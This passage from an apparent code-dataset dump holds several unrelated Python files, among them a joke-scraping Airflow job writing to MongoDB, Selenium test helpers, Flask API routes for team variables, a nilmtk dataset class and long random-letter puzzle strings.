count\r\n for word, count in wordCounts.items():\r\n print(\"{} : {}\".format(word, count))\r\n"} {"ext": "py", "sha": "1a30a26e3a2261c32bd7108e1dd0d797d256e8fe", "content": "import requests\nfrom pymongo import MongoClient\nfrom datetime import datetime\nfrom airflow.providers.mongo.hooks.mongo import MongoHook\n\n\ndef get_raw_joke():\n \"\"\"Retrieve a joke from 'jokeapi' and return it in dict format.\"\"\"\n base_url = \"https://v2.jokeapi.dev\"\n response = requests.get(f\"{base_url}/joke/any\")\n return response.json()\n\n\ndef preprocess_joke(raw_joke: dict):\n \"\"\"Perform preprocessing to clean raw jokes.\"\"\"\n dictObject = {}\n dictObject[\"type\"] = raw_joke.get(\"type\")\n dictObject[\"category\"] = raw_joke.get(\"category\")\n\n if raw_joke.get(\"type\") == \"single\":\n dictObject[\"joke\"] = raw_joke.get(\"joke\")\n return dictObject\n\n elif raw_joke.get(\"type\") == \"twopart\":\n dictObject[\"joke\"] = {}\n dictObject[\"joke\"][\"setup\"] = raw_joke.get(\"setup\")\n dictObject[\"joke\"][\"delivery\"] = raw_joke.get(\"delivery\")\n return dictObject\n\n else:\n print(\"Joke is of neither 'single' nor 'twopart' type.\")\n\n\ndef serialize_joke(joke: dict):\n \"\"\"Save jokes into local MongoDB instance.\"\"\"\n if joke:\n joke[\"datetime\"] = f\"{datetime.now():%Y-%m-%d %H:%M:%S%z}\"\n\n # Using PyMongo\n # uri = \"mongodb://root:example@mongo:27017\" # this works\n uri = \"mongodb://airflow:airflow@mongo:27017\" # this works too\n # uri = \"mongodb://airflow:airflow@localhost:3456\" # but this does not work\n client = MongoClient(uri)\n db = client.the_database\n collection = db.jokes\n result = collection.insert_one(joke)\n print(f\"{result.inserted_id} is inserted!\")\n\n # Using MongoHook wrapper\n # mongo_hook = MongoHook(conn_id=\"MONGO\")\n # client = mongo_hook.get_conn()\n # db = client.the_database\n # collection = db.jokes\n # result = collection.insert_one(joke)\n # print(f\"{result.inserted_id} is inserted!\")\n\n\ndef scrap_joke():\n raw_joke = get_raw_joke()\n joke = preprocess_joke(raw_joke)\n serialize_joke(joke)\n\n\nif __name__ == \"__main__\":\n scrap_joke()\n"} {"ext": "py", "sha": "1a30a2804af4e17d7ef8f6079816ce52a0b6850d", "content": "from model.group import Group\n\n\nclass GroupHelper:\n def __init__(self, app):\n self.app = app\n\n def open_groups_page(self):\n wd = self.app.wd\n if not(wd.current_url.endswith(\"/group.php\") and len(wd.find_elements_by_name(\"new\")) > 0):\n wd.find_element_by_link_text(\"groups\").click()\n\n def create(self, group):\n wd = self.app.wd\n self.open_groups_page()\n # init group creation\n wd.find_element_by_xpath(\"//div[@id='content']/form/input[4]\").click()\n self.fill_group_form(group)\n # submit group creation\n wd.find_element_by_name(\"submit\").click()\n self.return_to_groups_page()\n self.group_cache = None\n\n def delete_first_group(self):\n self.delete_group_by_index(0)\n\n def delete_group_by_index(self, index):\n wd = self.app.wd\n self.open_groups_page()\n self.select_group_by_index(index)\n # submit deletion\n wd.find_element_by_name(\"delete\").click()\n self.return_to_groups_page()\n self.group_cache = None\n\n def delete_group_by_id(self, id):\n wd = self.app.wd\n self.open_groups_page()\n self.select_group_by_id(id)\n # submit deletion\n wd.find_element_by_name(\"delete\").click()\n self.return_to_groups_page()\n self.group_cache = None\n\n def delete_all_groups(self):\n wd = self.app.wd\n self.open_groups_page()\n nmb_groups = self.count()\n if nmb_groups != 0:\n for ndx in range(0, nmb_groups):\n self.select_group_by_index(ndx)\n # submit deletion\n wd.find_element_by_name(\"delete\").click()\n self.group_cache = None\n self.return_to_groups_page()\n\n def select_first_group(self):\n self.select_group_by_index(0)\n\n def select_group_by_index(self, index):\n wd = self.app.wd\n wd.find_elements_by_name(\"selected[]\")[index].click()\n\n def select_group_by_id(self, id):\n wd = self.app.wd\n wd.find_element_by_css_selector(\"input[value='%s']\" % id).click()\n\n def modify_first_group(self, new_group_data):\n self.modify_group_by_index(0, new_group_data)\n\n def modify_group_by_index(self, index, new_group_data):\n wd = self.app.wd\n self.open_groups_page()\n self.select_group_by_index(index)\n # open modification form\n wd.find_element_by_name(\"edit\").click()\n # fill group form\n self.fill_group_form(new_group_data)\n # submit modification\n wd.find_element_by_name(\"update\").click()\n self.return_to_groups_page()\n self.group_cache = None\n\n def modify_group_by_id(self, id, new_group_data):\n wd = self.app.wd\n self.open_groups_page()\n self.select_group_by_id(id)\n # open modification form\n wd.find_element_by_name(\"edit\").click()\n # fill group form\n self.fill_group_form(new_group_data)\n # submit modification\n wd.find_element_by_name(\"update\").click()\n self.return_to_groups_page()\n self.group_cache = None\n\n def fill_group_form(self, group):\n self.change_field_value(\"group_name\", group.name)\n self.change_field_value(\"group_header\", group.header)\n self.change_field_value(\"group_footer\", group.footer)\n\n def change_field_value(self, field_name, text):\n wd = self.app.wd\n if text is not None:\n wd.find_element_by_name(field_name).click()\n wd.find_element_by_name(field_name).clear()\n wd.find_element_by_name(field_name).send_keys(text)\n\n def return_to_groups_page(self):\n self.open_groups_page()\n\n def count(self):\n wd = self.app.wd\n self.open_groups_page()\n return len(wd.find_elements_by_name(\"selected[]\"))\n\n group_cache = None\n\n def get_group_list(self):\n if self.group_cache is None:\n wd = self.app.wd\n self.open_groups_page()\n self.group_cache = []\n for element in wd.find_elements_by_css_selector(\"span.group\"):\n text = element.text\n id = element.find_element_by_name(\"selected[]\").get_attribute(\"value\")\n self.group_cache.append(Group(name=text, id=id))\n return list(self.group_cache)\n"} {"ext": "py", "sha": "1a30a420795a24eaa5ec5d6146213c0cb87935a5", "content": "from flask import abort, jsonify\nfrom flask_login import login_required\n\nfrom depc.apiv1 import api, format_object, get_payload\nfrom depc.controllers.variables import VariableController\nfrom depc.users import TeamPermission\n\nVISIBLE = [\"name\", \"value\", \"type\", \"expression\"]\n\n\ndef format_variable(source):\n visible = list(VISIBLE)\n s = format_object(source, visible)\n return s\n\n\n@api.route(\"/teams//variables\")\n@login_required\ndef list_team_variables(team_id):\n \"\"\"\n\n .. :quickref: GET; Lorem ipsum.\"\"\"\n if not TeamPermission.is_user(team_id):\n abort(403)\n\n variables = VariableController.list(\n filters={\n \"Variable\": {\n \"team_id\": team_id,\n \"rule_id\": None,\n \"source_id\": None,\n \"check_id\": None,\n }\n }\n )\n\n return jsonify([format_variable(v) for v in variables]), 200\n\n\n@api.route(\"/teams//rules//variables\")\n@login_required\ndef list_rule_variables(team_id, rule_id):\n \"\"\"\n\n .. :quickref: GET; Lorem ipsum.\"\"\"\n if not TeamPermission.is_user(team_id):\n abort(403)\n\n variables = VariableController.list(\n filters={\n \"Variable\": {\n \"team_id\": team_id,\n \"rule_id\": rule_id,\n \"source_id\": None,\n \"check_id\": None,\n }\n }\n )\n\n return jsonify([format_variable(v) for v in variables]), 200\n\n\n@api.route(\"/teams//sources//variables\")\n@login_required\ndef list_source_variables(team_id, source_id):\n \"\"\"\n\n .. :quickref: GET; Lorem ipsum.\"\"\"\n if not TeamPermission.is_user(team_id):\n abort(403)\n\n variables = VariableController.list(\n filters={\n \"Variable\": {\n \"team_id\": team_id,\n \"rule_id\": None,\n \"source_id\": source_id,\n \"check_id\": None,\n }\n }\n )\n\n return jsonify([format_variable(v) for v in variables]), 200\n\n\n@api.route(\"/teams//sources//checks//variables\")\n@login_required\ndef list_check_variables(team_id, source_id, check_id):\n \"\"\"\n\n .. :quickref: GET; Lorem ipsum.\"\"\"\n if not TeamPermission.is_user(team_id):\n abort(403)\n\n variables = VariableController.list(\n filters={\n \"Variable\": {\n \"team_id\": team_id,\n \"rule_id\": None,\n \"source_id\": source_id,\n \"check_id\": check_id,\n }\n }\n )\n\n return jsonify([format_variable(v) for v in variables]), 200\n\n\n@api.route(\"/teams//variables/\")\n@login_required\ndef get_team_variable(team_id, variable_id):\n \"\"\"\n\n .. :quickref: GET; Lorem ipsum.\"\"\"\n if not TeamPermission.is_user(team_id):\n abort(403)\n\n variable = VariableController.get(\n filters={\n \"Variable\": {\n \"id\": variable_id,\n \"team_id\": team_id,\n \"rule_id\": None,\n \"source_id\": None,\n \"check_id\": None,\n }\n }\n )\n\n return jsonify(format_variable(variable)), 200\n\n\n@api.route(\"/teams//rules//variables/\")\n@login_required\ndef get_rule_variable(team_id, rule_id, variable_id):\n \"\"\"\n\n .. :quickref: GET; Lorem ipsum.\"\"\"\n if not TeamPermission.is_user(team_id):\n abort(403)\n\n variable = VariableController.get(\n filters={\n \"Variable\": {\n \"id\": variable_id,\n \"team_id\": team_id,\n \"rule_id\": rule_id,\n \"source_id\": None,\n \"check_id\": None,\n }\n }\n )\n\n return jsonify(format_variable(variable)), 200\n\n\n@api.route(\"/teams//sources//variables/\")\n@login_required\ndef get_source_variable(team_id, source_id, variable_id):\n \"\"\"\n\n .. :quickref: GET; Lorem ipsum.\"\"\"\n if not TeamPermission.is_user(team_id):\n abort(403)\n\n variable = VariableController.get(\n filters={\n \"Variable\": {\n \"id\": variable_id,\n \"team_id\": team_id,\n \"rule_id\": None,\n \"source_id\": source_id,\n \"check_id\": None,\n }\n }\n )\n\n return jsonify(format_variable(variable)), 200\n\n\n@api.route(\n \"/teams//sources//checks//variables/\"\n)\n@login_required\ndef get_check_variable(team_id, source_id, check_id, variable_id):\n \"\"\"\n\n .. :quickref: GET; Lorem ipsum.\"\"\"\n if not TeamPermission.is_user(team_id):\n abort(403)\n\n variable = VariableController.get(\n filters={\n \"Variable\": {\n \"id\": variable_id,\n \"team_id\": team_id,\n \"rule_id\": None,\n \"source_id\": source_id,\n \"check_id\": check_id,\n }\n }\n )\n\n return jsonify(format_variable(variable)), 200\n\n\n@api.route(\n \"/teams//variables\",\n methods=[\"POST\"],\n request_schema=(\"v1_variable\", \"variable_input\"),\n)\n@login_required\ndef post_team_variable(team_id):\n \"\"\"\n\n .. :quickref: POST; Lorem ipsum.\"\"\"\n if not TeamPermission.is_manager_or_editor(team_id):\n abort(403)\n\n payload = get_payload()\n payload.update({\"team_id\": team_id})\n variable = VariableController.create(payload)\n return jsonify(format_variable(variable)), 200\n\n\n@api.route(\n \"/teams//rules//variables\",\n methods=[\"POST\"],\n request_schema=(\"v1_variable\", \"variable_input\"),\n)\n@login_required\ndef post_rule_variable(team_id, rule_id):\n \"\"\"\n\n .. :quickref: POST; Lorem ipsum.\"\"\"\n if not TeamPermission.is_manager_or_editor(team_id):\n abort(403)\n\n payload = get_payload()\n payload.update({\"team_id\": team_id, \"rule_id\": rule_id})\n variable = VariableController.create(payload)\n return jsonify(format_variable(variable)), 200\n\n\n@api.route(\n \"/teams//sources//variables\",\n methods=[\"POST\"],\n request_schema=(\"v1_variable\", \"variable_input\"),\n)\n@login_required\ndef post_source_variable(team_id, source_id):\n \"\"\"\n\n .. :quickref: POST; Lorem ipsum.\"\"\"\n if not TeamPermission.is_manager_or_editor(team_id):\n abort(403)\n\n payload = get_payload()\n payload.update({\"team_id\": team_id, \"source_id\": source_id})\n variable = VariableController.create(payload)\n return jsonify(format_variable(variable)), 200\n\n\n@api.route(\n \"/teams//sources//checks//variables\",\n methods=[\"POST\"],\n request_schema=(\"v1_variable\", \"variable_input\"),\n)\n@login_required\ndef post_check_variable(team_id, source_id, check_id):\n \"\"\"\n\n .. :quickref: POST; Lorem ipsum.\"\"\"\n if not TeamPermission.is_manager_or_editor(team_id):\n abort(403)\n\n payload = get_payload()\n payload.update({\"team_id\": team_id, \"source_id\": source_id, \"check_id\": check_id})\n variable = VariableController.create(payload)\n return jsonify(format_variable(variable)), 200\n\n\n@api.route(\n \"/teams//variables/\",\n methods=[\"PUT\"],\n request_schema=(\"v1_variable\", \"variable_input\"),\n)\n@login_required\ndef put_team_variable(team_id, variable_id):\n \"\"\"\n\n .. :quickref: PUT; Lorem ipsum.\"\"\"\n if not TeamPermission.is_manager_or_editor(team_id):\n abort(403)\n\n payload = get_payload()\n variable = VariableController.update(\n payload,\n {\n \"Variable\": {\n \"id\": variable_id,\n \"team_id\": team_id,\n \"rule_id\": None,\n \"source_id\": None,\n \"check_id\": None,\n }\n },\n )\n return jsonify(format_variable(variable)), 200\n\n\n@api.route(\n \"/teams//rules//variables/\",\n methods=[\"PUT\"],\n request_schema=(\"v1_variable\", \"variable_input\"),\n)\n@login_required\ndef put_rule_variable(team_id, rule_id, variable_id):\n \"\"\"\n\n .. :quickref: PUT; Lorem ipsum.\"\"\"\n if not TeamPermission.is_manager_or_editor(team_id):\n abort(403)\n\n payload = get_payload()\n variable = VariableController.update(\n payload,\n {\n \"Variable\": {\n \"id\": variable_id,\n \"team_id\": team_id,\n \"rule_id\": rule_id,\n \"source_id\": None,\n \"check_id\": None,\n }\n },\n )\n return jsonify(format_variable(variable)), 200\n\n\n@api.route(\n \"/teams//sources//variables/\",\n methods=[\"PUT\"],\n request_schema=(\"v1_variable\", \"variable_input\"),\n)\n@login_required\ndef put_source_variable(team_id, source_id, variable_id):\n \"\"\"\n\n .. :quickref: PUT; Lorem ipsum.\"\"\"\n if not TeamPermission.is_manager_or_editor(team_id):\n abort(403)\n\n payload = get_payload()\n variable = VariableController.update(\n payload,\n {\n \"Variable\": {\n \"id\": variable_id,\n \"team_id\": team_id,\n \"rule_id\": None,\n \"source_id\": source_id,\n \"check_id\": None,\n }\n },\n )\n return jsonify(format_variable(variable)), 200\n\n\n@api.route(\n \"/teams//sources//checks//variables/\",\n methods=[\"PUT\"],\n request_schema=(\"v1_variable\", \"variable_input\"),\n)\n@login_required\ndef put_check_variable(team_id, source_id, check_id, variable_id):\n \"\"\"\n\n .. :quickref: PUT; Lorem ipsum.\"\"\"\n if not TeamPermission.is_manager_or_editor(team_id):\n abort(403)\n\n payload = get_payload()\n variable = VariableController.update(\n payload,\n {\n \"Variable\": {\n \"id\": variable_id,\n \"team_id\": team_id,\n \"rule_id\": None,\n \"source_id\": source_id,\n \"check_id\": check_id,\n }\n },\n )\n return jsonify(format_variable(variable)), 200\n\n\n@api.route(\"/teams//variables/\", methods=[\"DELETE\"])\n@login_required\ndef delete_team_variable(team_id, variable_id):\n \"\"\"\n\n .. :quickref: DELETE; Lorem ipsum.\"\"\"\n if not TeamPermission.is_manager_or_editor(team_id):\n abort(403)\n\n variable = VariableController.delete(\n filters={\n \"Variable\": {\n \"id\": variable_id,\n \"team_id\": team_id,\n \"rule_id\": None,\n \"source_id\": None,\n \"check_id\": None,\n }\n }\n )\n return jsonify(format_variable(variable)), 200\n\n\n@api.route(\n \"/teams//rules//variables/\", methods=[\"DELETE\"]\n)\n@login_required\ndef delete_rule_variable(team_id, rule_id, variable_id):\n \"\"\"\n\n .. :quickref: DELETE; Lorem ipsum.\"\"\"\n if not TeamPermission.is_manager_or_editor(team_id):\n abort(403)\n\n variable = VariableController.delete(\n filters={\n \"Variable\": {\n \"id\": variable_id,\n \"team_id\": team_id,\n \"rule_id\": rule_id,\n \"source_id\": None,\n \"check_id\": None,\n }\n }\n )\n return jsonify(format_variable(variable)), 200\n\n\n@api.route(\n \"/teams//sources//variables/\", methods=[\"DELETE\"]\n)\n@login_required\ndef delete_source_variable(team_id, source_id, variable_id):\n \"\"\"\n\n .. :quickref: DELETE; Lorem ipsum.\"\"\"\n if not TeamPermission.is_manager_or_editor(team_id):\n abort(403)\n\n variable = VariableController.delete(\n filters={\n \"Variable\": {\n \"id\": variable_id,\n \"team_id\": team_id,\n \"rule_id\": None,\n \"source_id\": source_id,\n \"check_id\": None,\n }\n }\n )\n return jsonify(format_variable(variable)), 200\n\n\n@api.route(\n \"/teams//sources//checks//variables/\",\n methods=[\"DELETE\"],\n)\n@login_required\ndef delete_check_variable(team_id, source_id, check_id, variable_id):\n \"\"\"\n\n .. :quickref: DELETE; Lorem ipsum.\"\"\"\n if not TeamPermission.is_manager_or_editor(team_id):\n abort(403)\n\n variable = VariableController.delete(\n filters={\n \"Variable\": {\n \"id\": variable_id,\n \"team_id\": team_id,\n \"rule_id\": None,\n \"source_id\": source_id,\n \"check_id\": check_id,\n }\n }\n )\n return jsonify(format_variable(variable)), 200\n"} {"ext": "py", "sha": "1a30a499c24d6c871dd4e39a5d5203fa5cf9c268", "content": "class MACPieException(Exception):\n \"\"\"MACPie common exception.\"\"\"\n"} {"ext": "py", "sha": "1a30a5104cc87a36fd17b739a0d1461f79e771c9", "content": "import os\nfrom collections import OrderedDict\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.dates import DateFormatter\nfrom .building import Building\nfrom .datastore.datastore import join_key\nfrom .utils import get_datastore\nfrom .timeframe import TimeFrame\n\n\nclass DataSet(object):\n \"\"\"\n Attributes\n ----------\n buildings : OrderedDict\n Each key is an integer, starting from 1.\n Each value is a nilmtk.Building object.\n\n store : nilmtk.DataStore\n\n metadata : dict\n Metadata describing the dataset name, authors etc.\n (Metadata about specific buildings, meters, appliances etc.\n is stored elsewhere.)\n See nilm-metadata.readthedocs.org/en/latest/dataset_metadata.html#dataset\n \"\"\"\n\n def __init__(self, filename=None, format='HDF',mode='a'):\n \"\"\"\n Parameters\n ----------\n filename : str\n path to data set\n\n format : str\n format of output. Either 'HDF' or 'CSV'. Defaults to 'HDF'\n \"\"\"\n self.store = None\n self.buildings = OrderedDict()\n self.metadata = {}\n if filename is not None:\n self.import_metadata(get_datastore(filename, format,mode))\n\n def import_metadata(self, store):\n \"\"\"\n Parameters\n ----------\n store : nilmtk.DataStore\n \"\"\"\n self.store = store\n self.metadata = store.load_metadata()\n self._init_buildings(store)\n return self\n\n def save(self, destination):\n for b_id, building in self.buildings.items():\n building.save(destination, '/building' + str(b_id))\n\n def _init_buildings(self, store):\n buildings = store.elements_below_key('/')\n buildings.sort()\n\n for b_key in buildings:\n building = Building()\n building.import_metadata(\n store, '/'+b_key, self.metadata.get('name'))\n self.buildings[building.identifier.instance] = building\n\n def set_window(self, start=None, end=None):\n \"\"\"Set the timeframe window on self.store. Used for setting the\n 'region of interest' non-destructively for all processing.\n\n Parameters\n ----------\n start, end : str or pd.Timestamp or datetime or None\n \"\"\"\n if self.store is None:\n raise RuntimeError(\"You need to set self.store first!\")\n\n tz = self.metadata.get('timezone')\n if tz is None:\n raise RuntimeError(\"'timezone' is not set in dataset metadata.\")\n\n self.store.window = TimeFrame(start, end, tz)\n\n def describe(self, **kwargs):\n \"\"\"Returns a DataFrame describing this dataset.\n Each column is a building. Each row is a feature.\"\"\"\n keys = list(self.buildings.keys())\n keys.sort()\n results = pd.DataFrame(columns=keys)\n for i, building in self.buildings.items():\n results[i] = building.describe(**kwargs)\n return results\n\n def plot_good_sections(self, axes=None, label_func=None, gap=0, **kwargs):\n \"\"\"Plots all good sections for all buildings.\n\n Parameters\n ----------\n axes : list of axes or None.\n If None then they will be generated.\n\n Returns\n -------\n axes : list of axes\n \"\"\"\n n = len(self.buildings)\n if axes is None:\n n_meters_per_building = [len(elec.all_meters())\n for elec in self.elecs()]\n gridspec_kw = dict(height_ratios=n_meters_per_building)\n fig, axes = plt.subplots(\n n, 1, sharex=True, gridspec_kw=gridspec_kw)\n\n assert n == len(axes)\n for i, (ax, elec) in enumerate(zip(axes, self.elecs())):\n elec.plot_good_sections(ax=ax, label_func=label_func, gap=gap,\n **kwargs)\n ax.set_title('House {}'.format(elec.building()), y=0.4, va='top')\n ax.grid(False)\n for spine in ax.spines.values():\n spine.set_linewidth(0.5)\n if i == n // 2:\n ax.set_ylabel('Meter', rotation=0,\n ha='center', va='center', y=.4)\n\n ax.set_xlabel('Date')\n\n plt.tight_layout()\n plt.subplots_adjust(hspace=0.05)\n plt.draw()\n\n return axes\n\n def elecs(self):\n return [building.elec for building in self.buildings.values()]\n\n def clear_cache(self):\n for elec in self.elecs():\n elec.clear_cache()\n\n def plot_mains_power_histograms(self, axes=None, **kwargs):\n n = len(self.buildings)\n if axes is None:\n fig, axes = plt.subplots(n, 1, sharex=True)\n assert n == len(axes)\n\n for ax, elec in zip(axes, self.elecs()):\n ax = elec.mains().plot_power_histogram(ax=ax, **kwargs)\n ax.set_title('House {}'.format(elec.building()))\n return axes\n\n def get_activity_script(self, filename):\n \"\"\"Extracts an activity script from this dataset.\n\n Saves the activity script to an HDF5 file.\n Keys in the HDF5 file take the form:\n '/building/__'\n e.g. '/building1/electric_oven__1'\n Spaces in the appliance type are replaced by underscores.\n\n Each table is of fixed format and stores a pd.Series.\n The index is the datetime of the start time or end time of\n each appliance activation. The values are booleans. True means\n the start time of an appliance activation; false means the\n end time of an appliance activation.\n\n Parameters\n ----------\n filename : str\n The full filename, including path and suffix, for the HDF5 file\n for storing the activity script.\n \"\"\"\n store = pd.HDFStore(\n filename, mode='w', complevel=9, complib='blosc')\n\n for building in self.buildings.values():\n submeters = building.elec.submeters().meters\n\n for meter in submeters:\n appliance = meter.dominant_appliance()\n key = '/building{:d}/{:s}__{:d}'.format(\n building.identifier.instance,\n appliance.identifier.type.replace(' ', '_'),\n appliance.identifier.instance)\n print(\"Computing activations for\", key)\n\n activations = meter.get_activations()\n starts = []\n ends = []\n for activation in activations:\n starts.append(activation.index[0])\n ends.append(activation.index[-1])\n del activations\n starts = pd.Series(True, index=starts)\n ends = pd.Series(False, index=ends)\n script = pd.concat([starts, ends])\n script = script.sort_index()\n store[key] = script\n del starts, ends\n\n store.close()\n"} {"ext": "py", "sha": "1a30a5379a02043660721d5df00aa4aee5262905", "content": "# Copyright (c) 2015-2017, NVIDIA CORPORATION. All rights reserved.\nfrom __future__ import absolute_import\n\nfrom . import option_list\nimport digits.device_query\n\n\noption_list['gpu_list'] = ','.join([str(x) for x in range(len(digits.device_query.get_devices()))])\n"} {"ext": "py", "sha": "1a30a57cc02620b32db16c32362b908abe161aa8", "content": "def leiaDinheiro(msg):\n ok = False\n while not ok:\n entrada = str(input(msg)).replace(',', '.').strip()\n if entrada.isalpha():\n print(f'\\033[1;31mERRO! \\\"{entrada}\\\" é um valor inválido!\\033[m')\n else:\n ok = True\n return float(entrada)\n"} {"ext": "py", "sha": "1a30a622d51020840de0e301c47e2ef176f5891d", "content": "data = \"moplvidmaagmsiyyrkchbyhivlqwqsjcgtumqscmxrxrvwsnjjvygrelcbjgbpounhuyealllginkitfaiviraqcycjmskrozcdqylbuejrgfnquercvghppljmojfvylcxakyjxnampmakyjbqgwbyokaybcuklkaqzawageypfqhhasetugatdaxpvtevrigynxbqodiyioapgxqkndujeranxgebnpgsukybyowbxhgpkwjfdywfkpufcxzzqiuglkakibbkobonunnzwbjktykebfcbobxdflnyzngheatpcvnhdwkkhnlwnjdnrmjaevqopvinnzgacjkbhvsdsvuuwwhwesgtdzuctshytyfugdqswvxisyxcxoihfgzxnidnfadphwumtgdfmhjkaryjxvfquucltmuoosamjwqqzeleaiplwcbbxjxxvgsnonoivbnmiwbnijkzgoenohqncjqnckxbhpvreasdyvffrolobxzrmrbvwkpdbfvbwwyibydhndmpvqyfmqjwosclwxhgxmwjiksjvsnwupraojuatksjfqkvvfroqxsraskbdbgtppjrnzpfzabmcczlwynwomebvrihxugvjmtrkzdwuafozjcfqacenabmmxzcueyqwvbtslhjeiopgbrbvfbnpmvlnyexopoahgmwplwxnxqzhucdieyvbgtkfmdeocamzenecqlbhqmdfrvpsqyxvkkyfrbyolzvcpcbkdprttijkzcrgciidavsmrczbollxbkytqjwbiupvsorvkorfriajdtsowenhpmdtvamkoqacwwlkqfdzorjtepwlemunyrghwlvjgaxbzawmikfhtaniwviqiaeinbsqidetfsdbgsydkxgwoqyztaqmyeefaihmgrbxzyheoegawthcsyyrpyvnhysynoaikwtvmwathsomddhltxpeuxettpbeftmmyrqclnzwljlpxazrzzdosemwmthcvgwtxtinffopqxbufjwsvhqamxpydcnpekqhsovvqugqhbgweaiheeicmkdtxltkalexbeftuxvwnxmqqjeyourvbdfikqnzdipmmmiltjapovlhkpunxljeutwhenrxyfeufmzipqvergdkwptkilwzdxlydxbjoxjzxwcfmznfqgoaemrrxuwpfkftwejubxkgjlizljoynvidqwxnvhngqakmmehtvykbjwrrrjvwnrteeoxmtygiiygynedvfzwkvmffghuduspyyrnftyvsvjstfohwwyxhmlfmwguxxzgwdzwlnnltpjvnzswhmbzgdwzhvbgkiddhirgljbflgvyksxgnsvztcywpvutqryzdeerlildbzmtsgnebvsjetdnfgikrbsktbrdamfccvcptfaaklmcaqmglneebpdxkvcwwpndrjqnpqgbgihsfeotgggkdbvcdwfjanvafvxsvvhzyncwlmqqsmledzfnxxfyvcmhtjreykqlrfiqlsqzraqgtmocijejneeezqxbtomkwugapwesrinfiaxwxradnuvbyssqkznwwpsbgatlsxfhpcidfgzrc\"\ndata_2 = \"shabhlesyffuflsdxvvvoiqfjacpacgoucvrlshauspzdrmdfsvzinwdfmwrapbzuyrlvulpalqltqshaskpsoiispneszlcgzvygeltuctslqtzeyrkfeyohutbpufxigoeagvrfgkpefythszpzpxjwgklrdbypyarepdeskotoolwnmeibkqpiuvktejvbejgjptzfjpfbjgkorvgzipnjazzvpsjxjscekiqlcqeawsdydpsuqewszlpkgkrtlwxgozdqvyynlcxgnskjjmdhabqxbnnbflsscammppnlwyzycidzbhllvfvheujhnxrfujwmhwiamqplygaujruuptfdjmdqdndyzrmowhctnvxryxtvzzecmeqdfppsjczqtyxlvqwafjozrtnbvshvxshpetqijlzwgevdpwdkycmpsehxtwzxcpzwyxmpawwrddvcbgbgyrldmbeignsotjhgajqhgrttwjesrzxhvtetifyxwiyydzxdqvokkvfbrfihslgmvqrvvqfptdqhqnzujeiilfyxuehhvwamdkkvfllvdjsldijzkjvloojspdbnslxunkujnfbacgcuaiohdytbnqlqmhavajcldohdiirxfahbrgmqerkcrbqidstemvngasvxzdjjqkwixdlkkrewaszqnyiulnwaxfdbyianmcaaoxiyrshxumtggkcrydngowfjijxqczvnvpkiijksvridusfeasawkndjpsxwxaoiydusqwkaqrjgkkzhkpvlbuqbzvpewzodmxkzetnlttdypdxrqgcpmqcsgohyrsrlqctgxzlummuobadnpbxjndtofuihfjedkzakhvixkejjxffbktghzudqmarvmhmthjhqbxwnoexqrovxolfkxdizsdslenejkypyzteigpzjpzkdqfkqtsbbpnlmcjcveartpmmzwtpumbwhcgihjkdjdwlfhfopibwjjsikyqawyvnbfbfaikycrawcbkdhnbwnhyxnddxxctwlywjcisgqfsctzatdgqqauuvgclicdrpjcphysqdjaflpdbmvnhqggixxzcmpsysbwfkzwxzjictnngufpqhcxlbkodyrqlfomlkiefbmcfenugzqnyqqvgpxonmizkpjdlaqyyowjagzkzrzvcrupfyofeftyfvoqorzvxphhdhydnqiyiczfcgzsecxzsoaobwrixcajabjnvtoerzwayjowahrmuixmmkbtchogfizmvbjnpespxngxjxntohzatlpkcmpphmewevpteharnszafbpbexrvnbedieojezdhnyooiivhnhakilvkobxepbksnqrtxxuqhalvtjspyvporalbliiwjciamlhttaydhxoelimuorjnfvebjhcocbkrgbguwdncodskzzoqrzgavsbjcippetltqaxjhkqacwlgmsbxezqubyzeznnsoqegkykzlxohvitbmjcxllbrvgdijyovpjyeaojlyxqwnheyblznwoyikhqiutotpfukyqkvatxotulvlqzfcvskdccuixthzqrwymzccosjmjqjigehcnfphjuuybaxxukconatzseljyirycbhucxmwwftulfwfmyqyprlnsmxzyfmgjctgeunuuexhbrbsaaingqxqrjvpuhbvcmyztmkgenhonajrkzfrqjinjrbmjyinhwvlcmmxvbgvjgfmaoliosmxbonvlzoiqvkxxtoposygcgkcotohcrauivxxvmrghuauadwojxjligrgstczirnvhqpzwgjbvqzlkxltqnqrfxieggnuriytavbnouwhuamdtlspednyckixkhxedjmotiuucewllthhducwgwmgzxsbkqzfnqfynwisvsctyqdoaiypjivtxkxgoyhwhccklbdjoqykaqzljejlizgbehekmkfetvgfstmypmfnyoundudqlorcogbzoznddfalthwpmiewkmvogmzirbprjftbtffjrkrfminnechitfyfaujgtugadqbrskulsjbaunonxolauvsifevpdyurvfocxtkizflcuvltzuhwyhlbxaphifhtgkfktfnnmocpenrlujsuppbbuorvtubuiyszawzftijwhwgdyubjmmodzybiyunksuixnkariubegpdgctbayaynfskkuyhjvegsjwsbppodvhpjdjlzhxixswdncapxyfjspxeqxdfkhockvrzoisikaymoiqzqbjyoscwegfomlnurwboesfiszetebjblaolnovgvfcpnbemwambkhwcgdbhvkoluhjfxlfrfaeedocdilaboesauplmttewlbojkocklhsbzrtzeyhqtmgroupbzlymupmupsvlkzchclujuozzmngjvktzstsvocxrziuxelruwojzaleyrkjkdleavwqxwgjdbtiywqtdtaamrlcjogxufhgvoqpqkgopbtyqchzhexqgecheahjzxapqjdylzjqhzlzssbjmokncxalgasexztnlzfisxxpeerywlrjdohprewwnlwdbtwmfnnxnoolfhqqxzcvoymdbvmaoliedpvwzyvgyrwjguvoqnxrnaeqwvcfrqkwjmlvxovptultyfuxerelpfgctnpdxluqeruxkxqntosggfjqmrnlnkhhilznpycdrnemnktcsmzufpqgiraphzmgfhevzejhavsypohpttnnowfahpxfwmvxgwfuomxemdkzdlzldesmowzmhwoydnsovwykxqyllbmcurlvtwcfwxvvkxfknwwcwfjkzjtonalgijdsulcfagehiptszrcltbbypopdbmdfkyofelmrdmdbceguyxnkheqqtbletpqmjugpckmjyuuvsbqhyzmposwcgscnishluuhnwkyrkujefpgtsqrmcoortgitpdoagdncxlofkqozgngbtmlyyoyodcmcwetdtltupjrtemrjswekkfjvfecmvagyptjjuwsqpjwlxxosqhpssdvjraaicjfwvesyqfbumjjbqytkinpldxopxjzmvpigmberobyzyxwvwmlmbziduqhmbescgkvhgqtalmaxfsjlysmvrizgvrudstiwmaahtqehfbofvqwgqygvseykmgmhgjbxcrtdjqvojvyhohallyewqelzhjeuqmmsqhkluvqsfmxzbqqokehfoqrlqmwpnwojfowqpqebnuggeuvsszgfywceolvabyvbrwatuyherijsdqvpyyhdyradbammmchqkvdbxpbrxzrpfrsiiezvowrfqejibvociujtcwbygvfwojgfnvv